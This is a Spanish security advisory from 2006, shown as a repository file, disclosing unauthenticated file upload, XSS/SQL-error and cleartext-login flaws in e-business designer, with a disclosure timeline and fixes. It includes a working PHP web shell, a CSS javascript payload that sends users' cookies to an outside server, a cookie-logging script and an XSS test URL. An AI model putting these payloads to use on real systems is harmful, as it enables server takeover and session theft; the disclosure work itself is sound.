-
Notifications
You must be signed in to change notification settings - Fork 0
/
eBD-es.txt
284 lines (194 loc) · 10.1 KB
/
eBD-es.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
===============================
- Advisory -
===============================
Título: Múltiples vulnerabilidades en e-business designer
Gravedad: Crítica
Fecha: 03.May.2006
Autor: Pedro Andújar <pandujar *@* selfdefense.es>
WEB: http://www.digitalsec.es
http://www.514.es/
.: [ INTRODUCCIÓN ] :.
eBD es una potente herramienta de desarrollo integral que permite la producción, gestión
y publicación de información mediante Internet o una Intranet, desde un navegador web, sin
necesidad de implementaciones complejas ni costosas.
Con eBD se puede desarrollar cualquier tipo de aplicación web, ya sea intranet, extranet,
portal, etc. o bien integrar cualquier otro desarrollo o aplicación ya implantada, permitiendo
el acceso y la gestión de la información de forma centralizada en un único entorno Web.
Esta herramienta está extensamente utilizada en ayuntamientos y hospitales de toda España así
como otras conocidas empresas: d-link, Terra, RTVE, Banesto...
.: [ DESCRIPCIÓN TÉCNICA ] :.
Durante el desarrollo de unas pruebas de evaluación sobre varias aplicaciones gestionadas
por el software e-businness designer, se detectaron los siguientes fallos:
.: [ DEFECTO #1 ]
Gravedad: Alta
Título: Posibilidad de subir ficheros al sistema sin autenticación.
Afecta: <= v3.1.4
El acceso una a herramienta de edición web sin autenticación, permite a usuarios remotos la subida
de ficheros al sistema sin control de la extensión. Esta vulnerabilidad puede ser explotada accediendo
directamente a la siguiente URL:
http://ebdsite/common/html_editor/image_browser.upload.html
El fichero puede ser colocado en diversos directorios de la aplicación, por norma general es
facilmente localizable explorando el código fuente de la web y buscando el directorio de imágenes.
Otra herramienta de utilidad para localizar el fichero es:
http://edbsite/common/html_editor/image_browser.html
Adicionalmente se encuentra la herramienta de edición html, cuyos parámentros son:
function abre_html_editor(form_name,name,ancho,alto,idvista,atributo,source,links)
{
var argumentos = "form_name=" + form_name + "&name=" + name + "&source=" + source +
"&ebd_links=" + links;
if (idvista != null && idvista > 0)
argumentos += "&usar_vista=" + idvista;
if (atributo != null && atributo.length > 0)
argumentos += "&usar_atributo=" + atributo;
var href = "/common/html_editor/html_editor.html?"
El resultado de esta vulnerabilidad, consiste en la posibilidad de subir y/o modificar ficheros en el
sistema, provocando una alta posibilidad de ataque tanto en el servidor como en los clientes. Podríamos
modificar una imagen de la web con un exploit que atacaría los navegadores de los usuarios de la web.
Este tipo de ataques fueron realizados con exito sobre un server corriendo una versión 2.3.3 de eBD:
Server side exploiting:
+Ejecución de código en el sistema mediante el uso de php/asp... shells: Si el sistema tiene instalado php,
es posible ejecutar comandos a través del navegador, subiendo un fichero con el siguiente contenido:
----------------dsr.php-----------------
<?
$out = shell_exec($_GET["cmd"]." 2>&1");
echo "<pre>$out</pre>";
?>
----------------dsr.php-----------------
Posteriormente se podrán ejecutar comandos tal que http://edbsite/path/to/dsr.php&cmd=uname -a ; id
Client side exploiting:
+Ataques de Cross Site Scripting (XSS), en aplicaciones con autenticación: Puesto que los ficheros subidos mediante
"image_browser.upload.html", puedes sobreescribir ficheros légitimos de la aplicación, sería posible introducir en un
archivo de estilos (.css) un javascript, que nos enviará las cookies de los usuarios que inicien sesión, mediante una
petición get al nuestro servidor:
background: url('javascript:document.images[1].src="http://514.es/514.php?"+document.cookie;') repeat-x bottom;
En nuestro server podemos colocar un script para loggear las cookies que recibamos, aunque ya aparecen de igual forma
grabadas en el access_log.
XXX.XXX.XXX.XXX - - [25/Apr/2006:11:04:22 +0200] "GET /514.php?SESSION_ID=133844640fde6ef7bd6a7a9e1c5c4651
HTTP/1.1" 200 316 "http://ebdsite/?go=M8z23wqOtZxBnlKqIOyVzEdlo87WFfqH8prlq33Nju/nsQ==" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
Este script podría ser:
-----------------514.php------------------
<?
$log = "/var/tmp/debug.log";
$img_type = "png";
function load_png($img_path) {
$img = imagecreatefrompng ($img_path);
if ($img) {
return $img;
}
}
function load_gif($img_path) {
$img = imagecreatefromgif ($img_path);
if ($img) {
return $img;
}
}
function load_jpg($img_path) {
$img = imagecreatefromjpeg ($img_path);
if ($img) {
return $img;
}
}
$init = "Connection from ".$_SERVER['REMOTE_ADDR'];
file_put_contents($log, "$init\n", FILE_APPEND);
foreach ($_SERVER as $key => $srv) {
file_put_contents($log, "$key=$srv\n", FILE_APPEND);
}
if (isset ($_GET) && count($_GET) > 0) {
file_put_contents($log, "GET params\n", FILE_APPEND);
foreach ($_GET as $key => $srv) {
file_put_contents($log, "$key=$srv\n", FILE_APPEND);
}
}
if (isset ($_POST) && count($_POST) > 0) {
file_put_contents($log, "POST params\n", FILE_APPEND);
foreach ($_POST as $key => $srv) {
file_put_contents($log, "$key=$srv\n", FILE_APPEND);
}
}
file_put_contents($log, "\n", FILE_APPEND);
if ($img_type == "png") {
Header("Content-type: image/png");
ImagePNG(load_png("imgs/514.png"));
}
if ($img_type == "jpg") {
Header("Content-type: image/jpeg");
ImageJPEG(load_jpg("imgs/514.jpg"));
}
if ($img_type == "gif") {
Header("Content-type: image/gif");
ImageGIF(load_gif("imgs/514.gif"));
}
?>
-----------------514.php------------------
Adicionalmente, se ha comprobado que no existe un número máximo de sesiones concurrentes para cada usuario.
Esta característica facilita este tipo de ataques, ya que las cookies obtenidas de esa forma pueden ser utilizadas
a la vez que el usuario legítimo.
.: [ DEFECTO #2 ]
Gravedad: Alta
Título: Error en la validación de datos de entrada
Afecta: v2.3.3 no requiere usuario
v3.1.4 requiere autenticarse como administrador
En varios parámetros que parsea eBD, no se verifica la inclusión de caracteres especiales y por tanto son posibles los
ataques de injección de código o cross site scripting. Ej:
http://ebdsite/admin/form_grupo.html?id=<script>alert("dSR");</script>
Esta URL ejecutará el alert y además el servidor nos devolverá la cadena SQL y el path físico de la aplicación tal que:
ERROR en: SELECT * FROM Contenido C WHERE C.idContenido=' AND 1=1 AND ( idArea IS NULL OR idArea=3 ) -- You have an error
in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND
1=1 AND ( idArea IS NULL OR idArea=3 )' at line 1 at /usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm line 179. Stack:
[/usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm:179], [/usr/eBD/ebd_modules/eBD/DB/DBDriver.pm:377], [/usr/eBD/ebd_modules/eBD.pm:772],
[/usr/eBD/ebd_modules/eBD/Contenido.pm:453], [/usr/eBD/htdocs/transhotel/archivos/dhandler:28], [/usr/eBD/htdocs/ebdsite/archivos/
autohandler:3]
Lo mismo ocurre en la versión 2.3.3 de eBD al hacer peticiones al siguiente path:
* http://ebdsite/archivos/' o bien
* http://ebdsite/files/'
.: [ DEFECTO #3 ]
Gravedad: Media
Título: Ausencia de cifrado en proceso de autenticación
Afecta: <= v3.1.4
En el momento de la autenticación, que por defecto se produce vía http en lugar de https, los campos de usuario
y contraseña viajan por la red en texto claro, sin ningún tipo de ecodeado:
zona=inicial&username=DSR&password=514&entrar=Login
.: [ HISTORICO ] :.
* 24/Abr/2006: - Descubiertos varios fallos, durante la evaluación del software instalado en un cliente de
e-business designer.
* 25/Abr/2006: - Explotación de los fallos descubiertos anteriormente.
- Localización del contacto de seguridad de eBD.
* 26/Abr/2006: - Redactado borrador de este documento.
- Envio del advisory a <ebd.soporte@oasyssoft.com>.
- Comentarios por parte de eBD. Se indican las versiones afectadas por cada vulnerabilidad.
* 27/Abr/2006: - Modificaciones sobre el borrador.
* 02/May/2006: - Oasyssoft publica un parche sobre la subida de ficheros.
(http://lists.oasyssoft.com/ebd-devel/200605/msg00000.html)
* 03/May/2006 - Nuevos comentarios y modificaciones en el advisory.
* 10/May/2006: - Publicación del advisory.
.: [ RECOMENDACIONES ] :.
- Actualización inmediata del software a la última versión disponible (3.1.4).
- Implantación del parche de emergencia.
(http://lists.oasyssoft.com/ebd-devel/200605/binNr7awTFdvt.bin)
(A la espera de la release final para comienzos de Junio)
- Adicionalmente es recomendable:
+ Deshabilitar el listado de directorios en el servidor web.
+ Forzar la navegación sobre https en la medida de lo posible.
+ Eliminar el soporte php y/o asp del sistema si lo hubiera (y no fuera requerido).
+ Implementación de firewalls de aplicación o soluciones semejantes a ModSecurity.
+ Eliminar cuentas de prueba y verificar que las contraseñas son robustas.
.: [ RECONOCIMIENTOS ] :.
Gracias a A. Tarascó y J. Olascoaga por la ayuda con el XSS.
Saludos al bRaCu y la gente de !dSR, 514, haxorcitos y dlnd-0.
.: [ REFERENCIAS ] :.
[+] [eBD] e-business designer
http://www.ebdsoft.com/
[+] Cross Site Scripting FAQ
http://www.cgisecurity.com/articles/xss-faq.shtml
[+] NGS Advanced Sql Injection
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
[+] ModSecurity (Open source web application firewall)
http://www.modsecurity.org/
[+] Guide to Building Secure Web Applications
http://www.owasp.org/documentation/guide/guide_about.html
[+] !dSR - Digital Security Research
http://www.digitalsec.net/
[+] 514 - 77
http://www.514.es/
-=EOF=-